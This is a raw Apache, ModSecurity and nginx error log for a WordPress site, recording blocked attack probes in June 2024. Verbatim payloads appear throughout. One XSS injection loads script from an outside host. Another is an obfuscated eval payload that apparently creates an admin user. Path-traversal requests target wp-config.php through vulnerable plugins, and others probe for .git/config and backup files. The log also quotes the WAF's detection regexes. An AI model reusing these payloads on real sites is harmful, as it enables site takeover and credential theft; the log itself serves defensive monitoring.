"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1ONaxg= found within ARGS:signature: Sew4MYPhTfEe6//8 zpiX1ONaxg="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZlwdoANZPAGfR0DmXfUdywAAAM4"], referer: https://investigacionperu.com/?rest_route=%2Fjetpack%2Fv4%2Fconnection%2Fdata&_for=jetpack&token=%5EVopXz%26e6gkKIY%5Ese%23WMM8pjLm%26E6FML%3A1%3A1×tamp=1717312928&nonce=HUlCRy7x61&body-hash&signature=Sew4MYPhTfEe6%2F%2F8%2BzpiX1ONaxg%3D [Sun Jun 02 05:00:28.621135 2024] [authz_core:error] [pid 16048:tid 140097806595840] [client 64.225.75.246:43532] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/02 05:00:33 [error] 15903#15903: *195911 access forbidden by rule, client: 64.225.75.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/02 09:25:08 [error] 15903#15903: *199048 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /var/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/06/02 09:31:19 [error] 15902#15902: *199068 access forbidden by rule, client: 83.147.52.49, server: investigacionperu.com, request: "GET /var/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/03 02:33:53 [error] 15903#15903: *207493 access forbidden by rule, client: 104.234.204.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Jun 03 06:21:53.342883 2024] [:error] [pid 8824:tid 139818415642368] [client 103.21.141.95:41066] [client 103.21.141.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:result[_msg]: <svg/onload=eval(String.fromCharCode(118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,114,101,113,117,101,115,116,85,82,76,61,34,47,119,112,45,97,100,109,105,110,47,117,115,101,114,45,110,101,119,46,112,104,112,34,44,110,111,110,99,101,82,101,103,101,120,61,47,115,101,114,34,32,118,97,108,117,101,61,34,40,91,94,34,93,42,63,41,34,47,103,59,97,106,97,120,82,101,113,117,101,11..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/ [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zl2nUSFGGnibsiqncg9A0gAAANA"] 2024/06/03 07:44:34 [error] 8061#8061: *210334 access forbidden by rule, client: 83.147.52.49, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/03 11:58:44 [error] 8060#8060: *212704 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/03 14:00:38 [error] 8060#8060: *213821 access forbidden by rule, client: 83.147.52.49, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jun 03 16:21:58.188490 2024] [:error] [pid 8114:tid 139818407249664] [client 93.174.93.127:55780] [client 93.174.93.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:file_uploader_nonce. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "136"] [id "950911"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <html found within ARGS:file_uploader_nonce: l>\\x0a\\x0a<html lang="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Zl4z9udhXk8cJtpLXposnQAAAFE"], referer: http://investigacionperu.com/ 2024/06/03 17:34:47 [error] 8061#8061: *216767 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Jun 03 18:16:49.464762 2024] [:error] [pid 8824:tid 139818365286144] [client 52.209.50.202:60214] [client 52.209.50.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Microsoft URL Control"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-emoji-release.min.js"] [unique_id "Zl5O4SFGGnibsiqncg9H3wAAANY"] [Mon Jun 03 21:29:27.623962 2024] [authz_core:error] [pid 8824:tid 139818365286144] [client 172.105.197.17:35790] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/03 21:29:32 [error] 8061#8061: *220044 access forbidden by rule, client: 172.105.197.17, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jun 03 21:29:33.580103 2024] [authz_core:error] [pid 8114:tid 139818586130176] [client 206.81.24.74:35818] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/03 21:29:36 [error] 8061#8061: *220065 access forbidden by rule, client: 206.81.24.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/04 01:06:44 [error] 8060#8060: *222077 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue Jun 04 02:44:59.778403 2024] [authz_core:error] [pid 8824:tid 139818586130176] [client 142.93.143.8:40984] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/04 02:45:04 [error] 8061#8061: *223222 access forbidden by rule, client: 142.93.143.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jun 04 05:37:30.836561 2024] [authz_core:error] [pid 26372:tid 139733883651840] [client 64.227.70.2:44588] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/04 05:37:35 [error] 26326#26326: *224814 access forbidden by rule, client: 64.227.70.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Jun 04 08:07:25.733673 2024] [:error] [pid 26372:tid 139733833295616] [client 179.43.191.18:46546] [client 179.43.191.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zl8RjTrciooWXArE03oJzgAAAFE"], referer: https://investigacionperu.com 2024/06/04 09:10:37 [error] 26326#26326: *226493 access forbidden by rule, client: 83.147.52.37, server: cpanel.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue Jun 04 19:50:02.444722 2024] [:error] [pid 27021:tid 139733908829952] [client 5.188.62.140:58704] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zl-2OqrK6akPlgyZhZK-CgAAAMg"] [Tue Jun 04 21:53:18.742531 2024] [autoindex:error] [pid 26372:tid 139733917222656] [client 81.19.135.59:32972] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:20.533717 2024] [autoindex:error] [pid 27021:tid 139733791332096] [client 81.19.135.59:32974] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:21.539413 2024] [autoindex:error] [pid 26373:tid 139733791332096] [client 81.19.135.59:32976] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:22.277799 2024] [autoindex:error] [pid 26373:tid 139734031656704] [client 81.19.135.59:32978] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:23.393473 2024] [autoindex:error] [pid 26373:tid 139733900437248] [client 81.19.135.59:32980] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:24.430360 2024] [autoindex:error] [pid 26373:tid 139733858473728] [client 81.19.135.59:32982] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:25.394727 2024] [autoindex:error] [pid 26373:tid 139733833295616] [client 81.19.135.59:32984] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:26.255118 2024] [autoindex:error] [pid 26373:tid 139733850081024] [client 81.19.135.59:32986] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:27.493702 2024] [autoindex:error] [pid 26373:tid 139733892044544] [client 81.19.135.59:32988] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:30.518632 2024] [autoindex:error] [pid 26373:tid 139733816510208] [client 81.19.135.59:32990] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:33.825111 2024] [autoindex:error] [pid 26373:tid 139733875259136] [client 81.19.135.59:32994] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:53:35.201811 2024] [autoindex:error] [pid 27021:tid 139733908829952] [client 81.19.135.59:32996] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:54:18.669995 2024] [autoindex:error] [pid 26373:tid 139733900437248] [client 81.19.135.59:33048] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 04 21:54:19.753980 2024] [autoindex:error] [pid 27021:tid 139733883651840] [client 81.19.135.59:33050] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 05 02:27:23.709567 2024] [autoindex:error] [pid 27021:tid 139733791332096] [client 82.165.103.249:41350] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 05 02:27:32.384754 2024] [autoindex:error] [pid 26373:tid 139733892044544] [client 82.165.103.249:41354] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 05 04:43:23.845437 2024] [autoindex:error] [pid 6611:tid 139916184864512] [client 81.19.135.59:43154] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Wed Jun 05 04:43:32.661907 2024] [:error] [pid 6611:tid 139916159686400] [client 81.19.135.59:43160] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Wed Jun 05 04:44:19.024191 2024] [autoindex:error] [pid 6611:tid 139916260398848] [client 81.19.135.59:43190] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com 2024/06/05 09:59:08 [error] 5864#5864: *241475 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jun 05 10:46:01.663679 2024] [autoindex:error] [pid 5986:tid 139916268791552] [client 4.227.120.157:48116] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/06/05 14:25:48 [error] 5864#5864: *244279 access forbidden by rule, client: 83.147.52.37, server: webmail.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Jun 05 14:49:00.163305 2024] [:error] [pid 6611:tid 139916226828032] [client 5.188.62.140:52136] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZmDBLLfZx2Sf7LbCrFH2qAAAAMk"] [Wed Jun 05 15:20:35.851523 2024] [:error] [pid 5987:tid 139916151293696] [client 146.70.105.59:52866] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZmDIk-ddjqHaWkbIrEiTbgAAAJI"] [Wed Jun 05 15:20:49.058947 2024] [:error] [pid 5986:tid 139916184864512] [client 146.70.105.59:52902] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZmDIoez5jJkMRt_Mf_6ixQAAAE4"] [Wed Jun 05 15:20:51.190387 2024] [:error] [pid 5987:tid 139916184864512] [client 146.70.105.59:52908] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "ZmDIo-ddjqHaWkbIrEiTdQAAAI4"] [Wed Jun 05 15:20:53.888455 2024] [:error] [pid 5987:tid 139916252006144] [client 146.70.105.59:52918] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZmDIpeddjqHaWkbIrEiTdgAAAIY"] [Wed Jun 05 15:20:54.013613 2024] [:error] [pid 5986:tid 139916218435328] [client 146.70.105.59:52920] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=..%2F..%2F..%2F&filename=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/multi-plugin-installer/mpi_download.php"] [unique_id "ZmDIpuz5jJkMRt_Mf_6ixwAAAEo"] [Wed Jun 05 15:21:05.368471 2024] [:error] [pid 5986:tid 139916151293696] [client 146.70.105.59:52946] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZmDIsez5jJkMRt_Mf_6iyQAAAFI"] [Wed Jun 05 15:21:11.193695 2024] [:error] [pid 5985:tid 139916126115584] [client 146.70.105.59:52960] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match 